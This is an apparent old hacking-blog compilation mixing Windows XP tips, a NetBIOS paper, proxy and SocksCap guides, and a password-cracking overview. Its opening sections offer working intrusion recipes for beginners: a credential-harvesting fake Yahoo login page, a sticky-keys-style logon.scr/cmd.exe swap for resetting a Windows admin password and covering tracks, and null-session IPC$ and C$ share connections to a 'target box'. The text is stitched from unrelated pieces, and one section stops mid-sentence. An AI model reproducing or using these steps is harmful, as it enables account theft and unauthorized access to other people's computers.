guys,
Most of us yet dont know the passwords are hacked using php pages. These are basicaly called as Phishing pages.
Now what exactly these phishing pages are ??
they are similar kind of pages of those site of which the account belongs of an victim whose password is to be hacked.
They pages seems to be very similar to the genuine pages but are not, huh!!
beolw is an link
www.yahoobeta.com
if you clcik on this link an try to login you will not be logged in but willbe redirected to an original yahoo page and your password and emain id will be saved in the log file on my account in the server.
So be aware of phishing pages so use it for fun while some have cruel intentions,hence never click on any unknown sites whosoever may have sent it to you.
Php Hacking
How to Hack a Window XP Admins Password
This is a cool little computer trick for Microsoft Windows trick I’ve picked up in my travels and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:
cd\cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Doug and you want the password 1234 then you would enter “net user Doug 1234″ and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.
CREATE YOUR OWN LOGON MESSAGE
Create Your Own Logon Message
1 Click start
click run
type regedit,
then click ok!
2 In The registry editor, drill down to the following key:
hklm\software\Microsoft\Windows NT\Current version\Winlogon.
3 Right click LegalNoticeCaption,
click modify,
Type: THIS IS NEXT TRICK,and then click ok!
4 Right click legalNoticeText,
click modify, and then Close your message!
5 Restart Your Computer.
6 The message will appear every time you logon!
CMD commands for hacking
CMD HACKING COMMANDS
I am Sure u guys Know All these commands.... I want to Help The Beginers.. So i am Posting This....
Useful Things to do on CMD!
First, open your Network Connection and right click and select Properties. Then Select TCP/IP and click on Properties again. Now Click on Advanced and WINS tab. Select Default for NeBIOS.
Now back to the main Local Area Connection window, select File and Print Sharing for Mic*ft Networks and hit enter.
This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.
First thing you need to know is some very helpfull commands to use on CMD(Command Prompt).
In case you don't know how to get CMD open in your box, then click on Start, then Run, then type "cmd" (no quotes, off course... you know the drill).
Back to commands:
nslookup
net view
net use
net user
ping
tracert
arp
route
nbtstat
netstat
ipconfig
In case you don't know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does.
Lets start easy...
1) ping : This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the "ping" command.
ping x.x.x.x (x is the IP address)
or
ping www.whatever.com (www.whatever.com is the website you want to ping, but you don't know the IP)
OBS: Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down.
2) nslookup : This command has many functionalities.
One is for resolving DNS into IP.
Lets say you know the website URL but you don't know its IP(and you want to find out).
nslookup www.whatever.com (www.whatever.com is the website you want to find out the IP)
Now, another really nice function of nslookup is to find out IP of specific Mail Severs
nslookup (enter)
set type=mx (enter)
yahoo.com
This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP. Simple, isn't it?
OK, now why would you want to have an IP of a mail server?
To send spoofed mail to your friends or even for SE.
In case you looking for "How to spoof email", then look for my "How to spoof email tutorial" http://www.infowar.com/forums/showthread.php?s=&threadid=2360
3) tracert : This command will give you the hops that a packet will travel to reach its final destination.
OBS: This command is good to know the route a packet takes before it goes to the target box.
tracert x.x.x.x (x is the IP address)
or
tracert www.whatever.com (www.whatever.com is the website you don't know the IP)
4) arp : This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN.
arp -a
5) route : This command will show you the routing table, gateway, interface and metric.
Code:
route print
6) ipconfig : This command will show tons of very helpful things.
Your IP, gateway, dns in use.
Code:
ipconfig
or
Code:
ipconfig /all
this command will give all that info but for all networks you might have it.
Also, in case you have a dynamic IP and want to change it, then type...
Code:
ipconfig /release (this will release your IP)
ipconfig /renew (this will renew your iP)
OBS: Keep in mind that those commands will change your IP, but the new IP will still be tighed up to you. So don't do anything stupid.
7) netstat : This command will show you connection to your box.
Code:
netstat
or
Code:
netstat -a (this will show you all the listening ports and connection with DNS names)
netstat -n (this will show you all the open connection with IP addresses)
netstat -an (this will combined both of the above)
net view x.x.x.x or computername (will list the available sharing folders on the target box)
Now some hints:
Code:
net use \ipaddressipc$ "" /user:administrator
(this command will allow you to connect to the target box as administrator)
Now if you want to connect to the target box and browse the entire C drive, then use this command:
Code:
net use K: \computernameC$
(this will create a virtual drive on your "my computer" folder)
OBS: Keep in mind that this will only works if the target box doesn't have an administrator password set.
And least but not last, the "help" command.
Quote:
whatevercommand /help
or
Quote:
whatevercommand /?
This command will help you to understand what it does and all the switchs available for each command.
Very useful if you know the command, but forgot the right switch.
Password Cracking
Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password. The purpose of password cracking might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, but involves system administration privileges), to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily crackable passwords.
Passwords to access computer systems are usually stored, typically not in cleartext form, in a database so the system can perform password verification when users attempt to login. To preserve confidentiality of system passwords, the password verification data is typically generated by applying a one-way function to the password, possibly in combination with other data. For simplicity in this discussion, when the one-way function (which may be either an encryption function or cryptographic hash) does not incorporate a secret key, other than the password, we will refer to the one way function employed as a hash and its output as a hashed password.Even though functions that create hashed passwords may be cryptographically secure, possession of a hashed password provides a quick way to test guesses for the password by applying the function to each guess, and comparing the result to the verification data. The most commonly used hash functions can be computed rapidly and the attacker can test guesses repeatedly with different guesses until one succeeds,meaning the plaintext password has been recovered.
The term password cracking is typically limited to recovery of one or more plaintext passwords from hashed passwords, but there are also many other ways of obtaining passwords illicitly; without the hashed version of a password, the attacker can still attempt access to the computer system in question with guessed passwords. However well designed systems limit the number of failed access attempts and can alert administrators to trace the source of the attack if that quota is exceeded. With the hashed password, the attacker can work undetected, and if the attacker has obtained several hashed passwords, the chances for cracking at least one is quite high.
Otherwise it is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security (see password for details). However, cracking usually designates a guessing attack.
Cracking may be combined with other techniques. For example, use of a hash-based challenge-response authentication method for password verification may provide a hashed password to an eavesdropper, who can then crack the password. A number of stronger cryptographic protocols exist that do not expose hashed-passwords during verification over a network, either by protecting them in transmission using a high-grade key, or by using a zero-knowledge password proof.
Principal attack methods
Weak encryption
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords. One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length. LM hash converts the password into all uppercase letters then breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately. Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.
Guessing
See also: Password strength and Password policy
Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries and the user's personal information.
Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs.[1] Examples of insecure choices include:
* blank (none)
* the words "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person
* their birthplace or date of birth, or a friend's, or a relative's
* a pet's name
* a dictionary word in any language
* a name of a celebrity they like
* automobile licence plate number
* a row of letters from a standard keyboard layout (e.g., the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on.
In one survey of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was 1.[1]
Some users neglect to change the default password that came with their account on the computer system. And some administrators neglect to change default account passwords provided by the operating system vendor or hardware supplier. A famous example is the use of FieldService as a user name with Guest as the password. If not changed at system configuration time, anyone familiar with such systems will have 'cracked' an important password; such service accounts often have higher access privileges than a normal user account. Lists of default passwords are available on the Internet.[2]
Personal data about individuals are now available from various sources, many on-line, and can often be obtained by someone using social engineering techniques, such as posing as an opinion surveyor or a security control checker. Attackers who know the user may have information as well. For example, if a user chooses the password "19YaleLaw78" because he graduated from Yale Law School in 1978, a disgruntled business partner might be able to guess the password.
Cracking programs exist which accept personal information about the user being attacked and generate common variations for passwords suggested by that information.[3][4]
Brute force attack
A last resort is to try every possible password, known as a brute force attack. In theory, a brute force attack will always be successful since the rules for acceptable passwords must be publicly known, but as the length of the password increases, so does the number of possible passwords. This method is unlikely to be practical unless the password is relatively small. But, how small is too small? This depends heavily on whether the prospective attacker has access to the hash of the password, in which case the attack is called an offline attack (it can be done without connection to the protected resource), or not, in which case it is called an online attack. Offline attack is generally a lot easier, because testing a password is reduced to a quickly calculated mathematical computation; i.e., calculating the hash of the password to be tried and comparing it to the hash of the real password. In an online attack the attacker has to actually try to authenticate himself with all the possible passwords, where arbitrary rules and delays can be imposed by the system and the attempts can be logged. A common current length recommendation for cases where the attacker will not have access to the hash is 8 or more randomly chosen characters combining letters, numbers, and special (punctuation, etc) characters. Systems which limit passwords to numeric characters only, or upper case only, or, generally, which exclude possible password character choices make such attacks easier. Using longer passwords in such cases (if possible on a particular system) can compensate for a limited allowable character set. And, of course, even with an adequate range of character choice, users who ignore that range (using only upper case alphabetic characters, or digits alone, for instance) make brute force attacks much easier against those password choices.
Generic brute-force search techniques can be used to speed up the computation. But the real threat may be likely to be from smart brute-force techniques that exploit knowledge about how people tend to choose passwords. NIST SP 800-63 (2) provides further discussion of password quality, and suggests, for example, that an 8 character user-chosen password may provide somewhere between 18 and 30 bits of entropy, depending on how it is chosen. This amount of entropy is far less than what is generally considered safe for an encryption key.
How small is too small for offline attacks thus depends partly on an attacker's ingenuity and resources (e.g., available time, computing power, etc.), the latter of which will increase as computers get faster. Most commonly used hashes can be implemented using specialized hardware, allowing faster attacks. Large numbers of computers can be harnessed in parallel, each trying a separate portion of the search space. Unused overnight and weekend time on office computers can also be used for this purpose.
The distinction between guessing, dictionary and brute force attacks is not strict. They are similar in that an attacker goes through a list of candidate passwords one by one; the list may be explicitly enumerated or implicitly defined, may or may not incorporate knowledge about the victim, and may or may not be linguistically derived. Each of the three approaches, particularly 'dictionary attack', is frequently used as an umbrella term to denote all the three attacks and the spectrum of attacks encompassed by them.
Precomputation
Further information: Rainbow table
In its most basic form, precomputation involves hashing each word in the dictionary (or any search space of candidate passwords) and storing the
NETBIOS
Understanding NetBIOS
By NeonSurge
Released through the rhino9 Team
Preface
Before you begin reading this paper, understand that this paper was written for the novice to the concept of NetBIOS, but - it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like "Why did you start your paper off so basic?" - Simple, its written for people that may be coming from an enviroment that does not use NetBIOS, so they would need me to start with basics, thanks. -NeonSurge, rhino9 team.
Whats is NetBIOS?
NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for acessing networking services.
NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs.
It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependancies. It also spares software developers the task of developing network error recovery and low level message addressing or routing. The use of the NetBIOS interface does alot of this work for them.
NetBIOS standardizes the interface between applications and a LANs operating capabilities. With this, it can be specified to which levels of the OSI model the application can write to, making the application transportable to other networks. In a NetBIOS LAN enviroment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.
PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.
All communication in these enviroments are presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependant on the user program. These NCB's are divided into fields, these are reserved for input and output respectively.
NetBIOS is a very common protocol used in todays enviroments. NetBIOS is supported on Ethernet, TokenRing, and IBM PC Networks. In its original induction, it was defined as only an interface between the application and the network adapter. Since then, transport like functions have been added to NetBIOS, making it more functional over time.
In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.
NetBIOS Names
NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.
NetBIOS can consist of up to 16 aplhanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register their NetBIOS name.
When a client becomes active, the client advertises their name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process is as follows:
1. Uppon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to ensure every other client on the network receives the information.
2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name, stop all attempts to register that name.
3. If no other client on the network objects to the name registration, the client will finish the registration process.
There are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.
The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to indentify the functionality installed or the registered device or service.
[QuickNote: SMB and NBT (NetBIOS over TCP/IP work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name UDP. Port 138 is NetBIOS datagram UDP. Port 139 is NetBIOS session TCP. For further information on NetBIOS, read the paper at the rhino9 website listed above]
The following is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These suffixes are displayed in hexadecimal format.
Name Number Type Usage
==========================================================================
<\\_MSBROWSE_> 01 G Master Browser
IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service
Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0
For a quick and dirty look at a servers registered NetBIOS names and services, issue the following NBTSTAT command:
nbtstat -A [ipaddress]
NetBIOS Sessions
The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands the transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.
NetBIOS Datagrams
Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.
The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.
NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, has been paired with a network protocol called NetBEUI (network extended user interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.
Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name address resolution by using either broadcast or LMHOSTS files. In a Microsoft enviroment, you would probably also use a NetBIOS Namer Server known as WINS.
NetBEUI Explained
NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. The transport layer driver frequently used by Microsofts LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LanManger Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.
NetBIOS Scopes
A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (Known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer namee as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
increase the shutdown speed of PC
Increasing XP shutdown speed
Increasing shutdown speed by reducing wait times:
Windows XP stores a couple of values in its registry which are responsible for determining how long to wait before shutting down (killing) open applications and services once the shutdown command has been given.
By editing these two settings and changing them to lower values, you can considerably decrease the amount of time that Windows XP needs to successfully shut itself down. The first part of this tweak deals with setting the amount of time Windows will take to kill open applications on shutdown.
Open REGEDIT and navigate to 'HKEY_CURRENT_USER\Control Panel\Desktop\'
Highlight the 'WaitToKillAppTimeout' value.
Set it to '1000' (the default should be 20000).
Now highlight the 'HungAppTimeout' value
Set it to '1000' also.
------------------------------------------------------------------
FOR ALL USERS
Increasing shutdown speed by reducing wait times :
The second part of this tip changes the same settings, this time for all users on the system.
Open REGEDIT and navigate to 'HKEY_USERS\.DEFAULT\Control Panel\Desktop'
Highlight the 'WaitToKillAppTimeout' value.
Set it to '1000' (the default should be 20000).
Now highlight the 'HungAppTimeout' value.
Set it to '1000' also.
hiding you IP
You could try reading about wingates, socks and proxies (oh before i forget, turn off java, javascript, cookies, what's related, and smart update ... if you are using IE you're not very smart). Also try installing a firewall, or DHCP or you can learn from me!
There are situations in which you may want to visit a site without leaving a trace of the visit. For instance you want to check what's going on at your competitor's site. Your visit will generate a record in the log file. Frequent visits will generate many records. Do you want to know what kind of records? see in http://proxies.hotmail.ru/proxyck.htm or http://privacy.net/, http://www.leader.ru/cgi-bin/go?who, http://www.anonymizer.com/3.0/snoop.cgi - will tell you some scary info about what can be told about your computer via the internet.
Note that these tests are not very sophisticated. A dedicated "snooper" can often learn much more. Once I came across a server that tried to connect to my computer's disk while I was browsing ... that was an exciting experince. You should also remember about things like cookies (http://www.illuminatus.com/cookie.fcgi), hostile applets and java scripts, browser security holes and so on. So why don't we send someone instead of ourselves? Good idea.
Step #1-Determine your IP address:
To determine your IP address, go to http://megawx.aws.com/support/faq/software/ip.asp
Every computer connected to the Internet has a unique identifier called an IP address. On many networks, the IP address of a computer is always the same. On other networks, a random IP address is assigned each time a computer connects to the network. This is what we are referring to when we ask if you have a static or a dynamic IP address. If a system uses dynamic addressing, the IP can change quite often.
Step #2-Get Anonymous:
Method #1: Anonymizer
One can surf anonymously with the help of a nice service called the Anonymizer x (http://www.anonymizer.com/3.0/index.shtml). Check their site and just type a URL you want to visit -- the Anonymizer does the job for you, securing you from many potential dangers. When you follow a link on a page viewed via the Anonymizer you get there via the Anonymizer again, so you don't have to type a new URL. You can choose between pay or free service, but free service implies certain limitations such as 30 seconds delay before pages are loaded, and only HTTP (pay service allows FTP and HTTPS). There are a few sites that are inaccessible via the Anonymizer, e.g. some of the Web-based free e-mail services.
The Anonymizer has two more nice features. Firstly, there are WWW sites that are inaccessible from one place, but easily accessible from another. Once I was trying to load a page located in Australia for 20 minutes, all in vain. Using the Anonymizer immediately solved the problem. Secondly, there are certain sites that give you information depending on where you are "calling" from. Let's take an example. I was at Encyclopædia Britannica site, trying to check the price for their products. Clicking on Order Information button gave me the list of Britannica's dealers all over the world, no price info. Going to the same place via the Anonymizer led me to a different page, where I found the price list. As it turned out the local dealer's price for Encyclopædia Britannica CD'97 was several times higher than the one at which it's sold in USA. Good savings!
The Anonymizer is probably one of the most popular tools for anonymous surfing, but definitely not the only one. More and more similar services are emerging. A good alternative is JANUS (http://www.rewebber.de/) located in Germany. Janus is free, fast and can also encrypt the URL. Here is a quotation from their FAQ:
JANUS is able to encrypt URLs (uniform resource locator) in a way that these can be used as reference for a server. If a request with an encrypted URL occurs, JANUS is able to decrypt the URL and forward it to the server, without enabling the user to get knowledge about the server address. All references in the servers response are again encrypted before the response is forwarded to the client.
Method #2: Proxy Servers
One can also anonymize one's web surfing by using a proxy server. Proxy servers are similar to the Anonymizer, i.e. web pages are retrieved by the proxy server rather than by the person actually browsing the Web (you). But there are several important distinctions: proxy servers don't help with cookies, hostile applets or code. In most of the cases they do just one thing: they conceal your real geograhic location.
Most of proxy servers restrict access based on the IP address from which a user connects to them. In other words if you have an account with Bluh-Bluh-Com, you can't use La-Di-Da-Net's proxy server, access will be denied. Fortunately you can always find a "kind-hearted" proxy server on the Net the owners of which openly state that the service is publicly available, or a proxy server that doesn't restrict access that due to whatever reason, but the fact is not known to everyone.
How do you find a "kind-hearted" proxy server? Good news for lazy people: there are many lists of available proxy servers: http://tools.rosinstrument.com/cgi-bin/dored/cgi-bin/fp.pl/showlog
For those who are not so lazy: find your own proxy server, it's real easy. Go to Altavista (www.altavista.com) and type something like +proxy +server +configuration +port, and you'll get the list of Web pages where ISPs give complete instructions to their users of how they should configure their browsers. Try every proxy address and after 5 or 7 failures you will surely find a proxy server that works for you. So let's say you have found a proxy, e.g.: some.proxy.com, HTTP port 8080. To make your browser use a proxy server fill out the corresponding fields in Manual Proxy Configuration tab (hope you can find it yourself).
In Netscape Communicator do this:
Edit - Preferences - Advanced - Proxies - Manual proxy configuration - View, and for HTTP and FTP type name of your proxy server (example: proxy.siol.net) and port number (example 3128).
In Internet Explorer 4.0 do this:
View - Internet Options - Connection - mark "Access the Internet using a proxy server". At ADDRESS type name of the server (example: proxy.siol.net) and at PORT type port number (example: 3128), click on advanced button and mark "Use the same proxy server for all protocols".
Once you have carried out this simple operation, you can start surfing the Web leaving traces as if you are from Bulgaria, USA, North Korea (that would be fun!) or somewhere else, but ...there is one more very important privacy concern, "Is My Proxy Anonymous?"
Is My Proxy Anonymous?
Not all proxy servers are truly anonymous. Some of them let the system administrator of the site that you visit via a proxy server find out the IP address from which the proxy server is accessed, i.e. your real IP address. You can perform an anonymity check test: http://www.tamos.com/bin/proxy.cgi
If you get the message: Proxy server is detected! - then there is a security hole in your proxy, and information about your real IP address will be listed. If the message is Proxy server is not detected - everything should be OK. In any case, carefully study the list of IP addresses that is returned by this online tool. None of them should belong to you. You can also use alternative tests to check if your browser is anonymous. Such tests can give a complete list of the parametrs your browser passes to a remote server (this is called Environmental Variables). Proxys-4-All (http://proxys4all.cgi.net/tools.html) maintains a long list of environmental checkers.
Final Considerations
In spite of all of the the above said ... use proxies only when it's necessary. Working via proxy servers slows down data transfer rate and is an additional load on the network and the servers. Another important thing that is often forgotten by many people: use proxies for legal purposes. Hiding you identity is ok (at least in the free world) as long as you want to visit a site that offers, say, pornography. But if you use a proxy server for purchasing CDs or software with a bogus credit card number there is a good chance that you'll end up in prison, let alone the moral aspects. Remeber, all the connections are logged, and if you violate the law you can be tracked down. The site administrator can check the logs and contact the proxy's administrator, he can in turn check his own logs and find your real IP address, then they both will contact your ISP, and your ISP keeps logs too ... Anyway, I hope you got it.
Specially for paranoiacs
Look, different tools described above can be chained! For example you set up your browser to use Proxy A, and you know the addresses and port numbers of 2 more servers Proxy B and Proxy C. The URL that you type should look something like that: http://proxyB:port/http://proxyC:port/http://www.whereyougo.com/ As the result you go to the site via 3 servers: A,B and C. One of them can be the Anonymizer. WARNING: Not all the proxy servers allow chains like that. I won't answer your messages asking me why it doesn't work in your particular case!
Using SocksCap for anonymity in non HTTP applications (telnet, ftp, ICQ, RealPlayer, and so on)
What is SocksCap?
What is the current version?
What is the difference between SocksCap, SocksCap16, and SocksCap32?
Do I need to run SocksCap16, SocksCap32, or both?
Where do I get SocksCap?
Is SocksCap free? Is the source code available?
Will it work with all stacks and applications?
How do I know if it works with my stack and application?
What happens if I start SocksCap16 AFTER a WinSock application is already running?
What if I close SocksCap16 before closing a WinSock application?
Will I need to run ftp in PASV mode?
When I close SocksCap16 in Windows 95 or Windows for Workgroups, it tells me "Exiting SocksCap may cause some network connections to become unstable." I have already closed all the client applications.
Is SocksCap Y2K?
Can I use SocksCap32 with RealPlayer 5.0 and 6.0?
Can I use SocksCap32 with Internet Explorer 4.0 in desktop mode or on Windows98? What about Internet Explorer
5.0?What do I enter for SOCKS server and port in SocksCap Setup?
--------------------------------------------------------------------------------
What is SocksCap?
SocksCap automatically enables Windows-based TCP and UDP networking client applications to traverse a SOCKS firewall. SocksCap intercepts the networking calls from WinSock applications and redirects them through the SOCKS server without any modification to the orginal applications or to the operating system software or drivers.
What is the current version?
The current version of SocksCap16 (16-bit) is 1.02. The current release version of SocksCap32 (32-bit) is 1.03. A beta version of SocksCap32 (Version 2, Beta 3) is also available.
What is the difference between SocksCap, SocksCap16, and SocksCap32?
SocksCap refers to the 16- and 32-bit versions. SocksCap16 is the 16-bit version. SocksCap32 is the 32-bit
version.Do I need to run SocksCap16, SocksCap32, or both?
For Windows 3.1 and Windows for Workgroups 3.11, run SocksCap16.
For Windows 95 and Windows 98, you need SocksCap32 for the 32-bit applications. If you are running 16-bit applications under Windows 95 or Windows 98, you need SocksCap16 for those applications. You can run SocksCap16 and SocksCap32 simultaneously under Windows 95 and Windows 98 to handle both 16- and 32-bit applications.
Under Windows NT, use SocksCap32 for 32-bit applications. SocksCap16 does not run under Windows NT.
Where do I get SocksCap?
SocksCap is available for download through the SOCKS Web site at: http://www.socks.nec.com/.
Is SocksCap free? Is the source code available?
The software is available freely through the SOCKS web site. It is NOT in the public domain. Use and distribution is restricted and subject to certain agreements. Please read the full copyright, license terms, and restrictions in the file named "LICENSE.TXT" or "COPYRIGH.TXT" in the distribution. Source code is not available.
Will it work with all stacks and applications?
SocksCap functions independently from the applications and the stack. It needs to make some assumptions about the application and the stack implementations. Therefore, it will not work with every application and every stack. NEC USA has only tested SocksCap32 with m*cro$oft's 32-bit stack.
How do I know if it works with my stack and application?
The best way to find out is to try it. You may refer to the scorecard of applications and stacks with which SocksCap users have reported success or failure. Download the list from the SocksCap section at http://www.socks.nec.com/. Volunteers provide the information in the scorecard. The list is not complete and quickly becomes outdated. We greatly appreciate your additions and updates to the scorecard.
What happens if I start SocksCap16 AFTER a WinSock application is already running?
Start SocksCap16 before other WinSock applications. If SocksCap16 sees a request come from an application run prior to starting SocksCap16, it attempts to make all connections directly for that application. Beware that the application may become unstable.
What if I close SocksCap16 before closing a WinSock application?
SocksCap16 must remain running until after you close all network applications. When you attempt to close SocksCap16 and there are still active connections, SocksCap16 displays a warning and gives you a chance to cancel the exit. This does not apply to SocksCap32.
Will I need to run ftp in PASV mode?
FTP may experience problems, depending on the application and stack. Try running without PASV. If that does not work, try PASV.
When I close SocksCap16 in Windows 95 or Windows for Workgroups, it tells me "Exiting SocksCap may cause some network connections to become unstable." I have already closed all the client applications.
SocksCap16 notices that the "WSASRV" process is still running. Add "WSASRV" to the Direct Applications list in the SocksCap16 setup dialog.
Is SocksCap Y2K?
All dates and times in SocksCap16 and SocksCap32 are manipulated using structures from the operating system. As long as the OS and libraries are Y2K (year 2000 compliant), SocksCap should not have any problems.
Can I use SocksCap32 with RealPlayer 5.0 and 6.0?
Yes, but you need to configure RealPlayer so that it does not start up in the system tray. To do this in RealPlayer 5.0, select Preferences in the View menu. Click on the Advanced tab. Clear the check box for "Allow RealPlayer to run in the system tray." In RealPlayer 6.0, select Preferences in the Options menu. Under the General tab, clear the check box for "Allow SmartStart to run in the system tray."
Can I use SocksCap32 with Internet Explorer 4.0 in desktop mode or on Windows 98? What about Internet Explorer
5.0?Although SocksCap32 will not socksify your entire desktop, it is possible to browse with Internet Explorer 4.0 in desktop mode or on Windows 98 with SocksCap32. Select Internet Options in Internet Explorer's View menu. Under the Advanced tab, check the "Browse in a new process" box. Then open an individual Internet Explorer process by starting it from SocksCap32.
For Internet Explorer 5.0, select Internet Options in Internet Explorer's Tools menu. Under the Advanced tab, check the "Launch browser windows in a separate process" box. Under the Connections tab, click the LAN Settings button. Clear check box for "Automatically detect settings."
What do I enter for SOCKS server and port in SocksCap Setup?
Enter the address and port of the SOCKS server you need to traverse. If you are not sure what those are, contact your ISP, network administrator, or firewall administrator for your site or consult a list 1080.htm.
--------------------------------------------------------------------------------
FTP-Hacking
What Is FTP and What Is It Good For?
------------------------------------
The word FTP (see footnote 1 below) stands for File Transfer Protocol(1).
FTP servers will let you to both download (retrieve a file from the server) and upload (send a file to the server) files from the server with great ease (if you have permission to do so).
